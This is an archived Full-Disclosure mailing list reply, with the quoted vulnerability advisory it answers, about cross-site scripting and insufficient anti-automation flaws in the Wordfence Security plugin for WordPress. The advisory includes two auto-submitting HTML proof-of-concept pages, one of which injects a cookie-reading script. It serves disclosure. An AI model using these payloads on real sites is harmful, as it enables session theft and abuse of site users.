lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Fri, 19 Oct 2012 18:37:13 +0100
From: Philip Whitehouse <philip@...uk.com>
To: "<full-disclosure@...ts.grok.org.uk>" <full-disclosure@...ts.grok.org.uk>
Cc: "<submissions@...ketstormsecurity.org>"
	<submissions@...ketstormsecurity.org>
Subject: Re: XSS and IAA vulnerabilities in Wordfence
	Security for WordPress

Hmm,

Another 'security' plugin with vulnerabilities...

What exactly is the point of them? Even in an ideal world surely WP should be secure anyway - doesn't it just increase the attack surface?

Philip Whitehouse

On 19 Oct 2012, at 18:16, "MustLive" <mustlive@...security.com.ua> wrote:

> Hello list!
> 
> I want to warn you about Cross-Site Scripting and Insufficient 
> Anti-automation vulnerabilities in Wordfence Security for WordPress.
> 
> Wordfence - it's security plugin for WordPress.
> 
> -------------------------
> Affected products:
> -------------------------
> 
> Vulnerable are Wordfence Security 3.3.5 and previous versions.
> 
> ----------
> Details:
> ----------
> 
> XSS (WASC-08):
> 
> Wordfence Security XSS.html
> 
> <html>
> <head>
> <title>Wordfence Security XSS exploit (C) 2012 MustLive. 
> http://websecurity.com.ua</title>
> </head>
> <body onLoad="document.hack.submit()">
> <form name="hack" action="http://site/?_wfsf=unlockEmail" method="post">
> <input type="hidden" name="email" 
> value="<script>alert(document.cookie)</script>">
> </form>
> </body>
> </html>
> 
> Insufficient Anti-automation (WASC-21):
> 
> Wordfence Security IAA.html
> 
> <html>
> <head>
> <title>Wordfence Security IAA exploit (C) 2012 MustLive. 
> http://websecurity.com.ua</title>
> </head>
> <body onLoad="document.hack.submit()">
> <form name="hack" action="http://site/?_wfsf=unlockEmail" method="post">
> <input type="hidden" name="email" value="admin@...ail.com">
> </form>
> </body>
> </html>
> 
> I've informed the plugin developer about vulnerabilities. And mentioned 
> about these vulnerabilities at my site (http://websecurity.com.ua/6106/).
> 
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua 
> 
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ